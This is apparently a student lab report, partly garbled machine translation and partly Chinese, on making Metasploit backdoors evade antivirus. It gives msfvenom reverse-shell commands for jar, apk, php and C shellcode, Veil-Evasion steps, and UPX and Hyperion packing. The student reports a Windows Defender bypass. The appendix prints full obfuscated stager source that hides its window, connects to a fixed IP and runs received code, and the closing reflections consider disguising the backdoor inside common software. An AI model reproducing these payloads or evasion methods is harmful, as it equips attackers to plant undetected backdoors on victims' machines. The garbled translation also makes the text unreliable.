1. Experimental environment
- PC machine, installed win10 system, were measured as a target drone
- Kali installed virtual machine, as attack aircraft
- kali virtual machine installed veil-evasion
- win10 system windows Defender as a soft kill.
- VirusTotal website is detected
Experimental preparation that is knowledge
VirusTotal、Virscan
- It integrates multiple scan engines 60 commercial antivirus software. You can be uploaded free to kill treated program for testing.
- Links are as follows:
Msfvenom using an encoder
- Msfvenom is a tool used to encode the next platform Metasploit payloads to avoid killing.
- Msfvenom template is used to generate the final shell exe files Exe's, msfvenom will generate a fixed template exe, it generates all the exe, if the default parameters or template, there are certain fixed characteristics.
Veil-Evasion
- Veil-Evasion is a platform to avoid killing, and Metasploit somewhat similar, there are at Kalil software library, but not installed by default.
C language calling Shellcode
- Is a half-handcrafted malware examples.
Packers
-
- Packers should be the full name of the executable program resource compression, the compressed program can be run directly.
- Another common way packers are implanted in a binary program a piece of code at run time priority access control program, then after the control back to the original code, the purpose of doing so is to hide the real program of the OEP (entry point, to prevent cracking).
- The program requires packers to prevent an external program or software on the packer itself compilation, analysis or dynamic analysis
- Technically divided into partial shells:
- Compression Shell
- Encryption shell
- virtual machine
2. Experimental content
-
2.1 msf proper use of the encoder, msfvenom generates other files, such as a jar or the like, veil-evasion, their use to kill Free shellcode programming tools or techniques; (1.5 min)
-
2.2 malicious code implemented by a combination of various techniques to avoid killing the application (1 min)
(If successfully achieved to avoid killing, simple language to describe the principle, not shots. Symbiosis with the soft kill results to verify the screenshot.)
- 2.3 In the case of soft kill open, you can run with the other computer and found success back to even, soft kill specify the name and version of the computer (1 point)
3. Experimental Procedure
A task
3.1 MSF encoder
The original ecology of the back door of the last experiment, the Virus Total website is relentless siege. If even this is antivirus software can not kill, it is also great when hackers
Then we add a coder try it, explain the four parameters
-p Sets payload, load attack. It is to explain what we want to attack the system Yes.
-e encoding
-b avoid bad character
-f last generation of what file format
The effect is not very good, the result is not very satisfactory, nothing changes.
The other document generating msfvenom jar or the like
- 1. Generate a jar file
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.157.134 lport=528 x> 20175236_JAVAbackdoor.jar
- Scan Results: The detection rate does reduce the number of
- 2. Generate apk file
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.157.134 LPORT=5236 R > 20175236_APKbackdoor.apk
- Scan results and feel almost on top of jar
- 3. Generate php file
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.157.134 lport=5236 x> 20175236_PHPbackdoor.php
- Scan results should be much better than the previous few
3.2 veil-evasion
This installation tool installation method reference
veils Installation Guide
- Installed veil
- Then enter the
veilcommand into the control panel veil - Enter the
use evasioncommand into the veil-evasion - Enter
use c/meterpreter/rev_tcp.pyinto the configuration interface - Set rebound connect IP:
set LHOST 192.168。157.134( here KaliIP ), port:set LPORT 5236 - Enter the
generategenerated files, then enter the name you want the payload20175236_eva.exe, as shown, save the file path:/var/lib/veil/output/compiled/20175236_eva.exe
- Use VirusTotal detect screenshot:
3.3 shellcode
- First, we need Mr. into a period of shellcode (see note your own ip address)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.157.134 LPORT=5236 -f c
- C then create a file
wpyshell.c, copy the code below into it, and the new shellcode
|
1
2
3
4
5
6
7
|
unsigned
char
buf[] =
'shellcode'
int
main()
{
int
(*func)() = (
int
(*)())buf;
func();
}
|
- Then because we need to put this under windoes run, so the need for cross-compiler (if you can not
sudo apt-get install mingw-w64download the compiled software)
1i686-w64-mingw32-g++ wffshell.c -o wffshell.exe
- Add to the above website scanning
shellcode just compiled successfully, the system will call the police, and it seems fake scan results are not good enough.
3.4 Upx packers, Hyperion packers
1. To the above shellcode adding a compression housing (UPX):
upx wffshell.exe -o wffshellupxed.exe
2. Shell encryption process: the previously generated exe files are copied to /usr/share/windows-binaries/hyperion/directory
Shell command
wine hyperion.exe -v wffshellupxed.exe 5236-wffshellhyperion.exe
After the packers, copied from the virtual machine to win10 when it was found to be a virus, this case may be transparent, what was seen through. But the same upload online scanning was relatively better with so little or no shell.
3.5 shellcode deformation
This method is to use an encoder to encode shellcode or WIndowsDefener is blocked.
Task II
We can use the msfvenom -l encodersencoder can be used to generate a view different from the back door
Task three
3.6 to compile the source code generated by the Veil
Win10 copied to the compiled open minGW GCC compiler to compile with cmd.
Windows Defender scan just generated EXE request, I would like to let you scan it, big deal back to my ways. Unfortunately, for the security scan results, I can not help it.
Build on the progress that I put online test wave. Trance, 7/65, only seven anti-virus software is identified as a virus, the compiler of the back door so to deceive.
Then windows Defender killing, the result is safe.
Run it in win10, Windows Defender and no abnormalities were found. kali quickly even on the
4. The contents of the report:
4.1. Basic questions answered
How to (1) kill soft is detected malicious code?
-
1. Static signature concept of killing
Extracted from virion virus signature files and compare one by one. The virus signature is only just possible there will be a series of binary string of anti-virus companies in the analysis of the virus, determined by these features can be opened with other viruses or the difference between the normal procedure.
-
2. heuristic detection
Heuristic detection engine and virtual machine behavior detection combined, performed by simulation, analysis testing technology security program behavior.
The difference between normal and virus programs can be reflected in many ways, such as the more common: usually an application in the first instruction is to check whether the command line parameter entry, clear the screen and save the original screen display, while the virus program is not do so, it is usually first instruction operation is to write directly related to disk operation instruction sequence, decoded instructions, or search for executable programs and the like at a certain path. These significant differences, a skilled programmer in debug state can glance at a glance. Heuristic code scanning technology is actually put this experience and knowledge to move to a specific virus software program embodied in the investigation.
If a software and malicious code to do the same, so that such a program is malicious code, is summed up in their own words: would rather kill the wrong, can not let go
-
3. cloud killing
Cloud security is an emerging security killing mechanism, different security vendors cloud security mechanism is not the same as killing. Cloud-based sharing feature library scanning mechanism 360 security guards, computer housekeeper, scanning mechanism is based on active defense credibility cloud.
(2) is free to kill what to do?
Simply put, free to kill, it is to avoid killed.
Specific point, is to let free to kill anti-virus software can not find the malicious code.Professional point, that is, the malicious code will be modified and packaged by the principle of killing malicious code for antivirus software, which in turn allows malicious code can not be detected and killing anti-virus software, better implanted in the attacked host some illegal operation.
(3) basic methods to avoid killing what?
How to bypass static killing?
1 dynamic invocation API
2 code obfuscation techniques
3 substitute the underlying API calls
4 shell protection
How to break heuristic?
1 内存载入解析技术 2 模块二次载入技术 3 模块劫持和白名单 4 白名单进程 5 功能模块分离 6 代码注入 7 正常软件行为模拟How to break through the cloud killing?
1 降低本地文件行为危险等级; 2 白名单机制; 3 文件体积膨胀;
4.2. Practice and Experience summary
我原来以为杀毒软件是万能的,又能杀毒,又能清理垃圾,还能给系统打补丁,好厉害,好神奇,简直是万能的。现在想想,仅仅依靠杀毒软件是万万不能的。杀软查不出的病毒还是很多的,比如我们这次实验做的后门……大多数同学都达到了免杀的效果。主要是自己不能乱下载来源不明的东西,不能轻易相信别人的U盘。做好主机的保护,首先不给病毒进入电脑的机会,其次才是查杀电脑里的病毒。
4.3. What still missing from combat techniques or steps?
1.不能控制公网的主机。
很明显我的后门只能在局域网使用。如果别人和我不在一个网段,我就无能为力了。所以,想窃取点信息什么的,基本没戏。
2.不能大范围渗透。
我的后门只能依靠拷贝来传播,这样很效率太低了,而且很容易被发现。还是合成到某个常用的应用程序里,伪装成正常的软件,让大家下载使用,这才是真正的后门。
appendix
#define _WIN32_WINNT 0x0500 #include <winsock2.h> #include <stdlib.h> #include <string.h> #include <stdio.h> #include <windows.h> char* zEHdmMza(char* s){ char *result = malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\0'; return result; } char* UWrUOItcH(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\0'; return t2; } void WEmNTlr() {WORD PohvbK = MAKEWORD((2*1+0), (2*1+0)); WSADATA fNdgibEfMhOVBRZ;if (WSAStartup(PohvbK, &fNdgibEfMhOVBRZ) < 0) { WSACleanup(); exit(1);}} char* orDXSozjOHGbRvj(){ char lOlMtqdvCyJvgh[7844], XINcUZENitFo[7844/2]; strcpy(lOlMtqdvCyJvgh,"TfNgaMgNsolzjfEvBwmKEMLruzPmOwKsicYOqxtojAmrDUYpgk"); strcpy(XINcUZENitFo,"iIBEpwwQOsQcNTiVTWdXRuixIMUJWdKKLVZlJgokgUNKwULssq"); return UWrUOItcH(strcat( lOlMtqdvCyJvgh, XINcUZENitFo)); } void eTPexPqYiKxF(SOCKET pBBfHTDs) {closesocket(pBBfHTDs);WSACleanup();exit(1);} char* bOVXbWrhRapwGZG() { char fkHWUVRVMBuk[7844] = "xFMXorfPEflsxAnqpfArCeEiJmbpyjzPkQOtfWpKajPONGsppp"; char *kHAMqrqgt = strupr(fkHWUVRVMBuk); return strlwr(kHAMqrqgt); } int NqHuwUNhrJbliQw(SOCKET IAbOCXWeco, void * dXfsDEwwK, int cWCnDcNDcadCkW){int slfkmklsDSA=0;int rcAmwSVM=0;void * startb = dXfsDEwwK;while (rcAmwSVM < cWCnDcNDcadCkW) {slfkmklsDSA = recv(IAbOCXWeco, (char *)startb, cWCnDcNDcadCkW - rcAmwSVM, 0);startb += slfkmklsDSA; rcAmwSVM += slfkmklsDSA;if (slfkmklsDSA == SOCKET_ERROR) eTPexPqYiKxF(IAbOCXWeco);} return rcAmwSVM; } char* tkjcDeawhCvdv(){ char *rQjTAe = zEHdmMza("qKybxoVpNenJZltcloNxIsqPTNxzvrSgjYkUMBsilcOVOBzwfb"); return strstr( rQjTAe, "N" );} SOCKET YjyMOHHZXkgw() { struct hostent * iuPGysX; struct sockaddr_in eWLoFfCGByNAjb; SOCKET XCmQvron;XCmQvron = socket(AF_INET, SOCK_STREAM, 0);if (XCmQvron == INVALID_SOCKET) eTPexPqYiKxF(XCmQvron);iuPGysX = gethostbyname("172.16.2.21");if (iuPGysX == NULL) eTPexPqYiKxF(XCmQvron);memcpy(&eWLoFfCGByNAjb.sin_addr.s_addr, iuPGysX->h_addr, iuPGysX->h_length);eWLoFfCGByNAjb.sin_family = AF_INET;eWLoFfCGByNAjb.sin_port = htons((153*29+7));if ( connect(XCmQvron, (struct sockaddr *)&eWLoFfCGByNAjb, sizeof(eWLoFfCGByNAjb)) ) eTPexPqYiKxF(XCmQvron);return XCmQvron;} int main(int argc, char * argv[]) {ShowWindow( GetConsoleWindow(), SW_HIDE );ULONG32 CzIQYmzQqYH;char * irLdgEDHmFT;int i;char* fCWGuAPrFJiMzr[1852];void (*ymruLxVUW)();for (i = 0; i < 1852; ++i) fCWGuAPrFJiMzr[i] = malloc (8772);WEmNTlr();char* vABmQT[6724];SOCKET KbhgtHYviCTSU = YjyMOHHZXkgw();for (i = 0; i < 6724; ++i) vABmQT[i] = malloc (8479);int xHqATxtd = recv(KbhgtHYviCTSU, (char *)&CzIQYmzQqYH, (4*1+0), 0);if (xHqATxtd != (4*1+0) || CzIQYmzQqYH <= 0) eTPexPqYiKxF(KbhgtHYviCTSU);irLdgEDHmFT = VirtualAlloc(0, CzIQYmzQqYH + (5*1+0), MEM_COMMIT, PAGE_EXECUTE_READWRITE);char* GUQnFwRVzocu[380];for (i=0; i<1852; ++i){strcpy(fCWGuAPrFJiMzr[i], orDXSozjOHGbRvj());}if (irLdgEDHmFT == NULL) eTPexPqYiKxF(KbhgtHYviCTSU);irLdgEDHmFT[0] = 0xBF;memcpy(irLdgEDHmFT + 1, &KbhgtHYviCTSU, (4*1+0));for (i = 0; i < 380; ++i) GUQnFwRVzocu[i] = malloc (9299);for (i=0; i<6724; ++i){strcpy(vABmQT[i], bOVXbWrhRapwGZG());}xHqATxtd = NqHuwUNhrJbliQw(KbhgtHYviCTSU, irLdgEDHmFT + (2*2+1), CzIQYmzQqYH);ymruLxVUW = (void (*)())irLdgEDHmFT;ymruLxVUW();for (i=0; i<380; ++i){strcpy(GUQnFwRVzocu[i], tkjcDeawhCvdv());}return 0;}